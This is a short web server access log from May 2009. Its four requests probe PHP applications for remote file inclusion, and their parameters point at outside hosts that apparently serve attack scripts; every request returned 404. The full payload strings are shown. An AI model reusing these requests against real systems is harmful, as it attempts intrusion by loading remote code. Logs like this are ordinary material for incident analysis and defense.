218.249.36.194 - - [20/May/2009:05:59:30 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:59:40 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:59:41 -0400] "GET /logs/access_log.Q108101000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:59:54 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
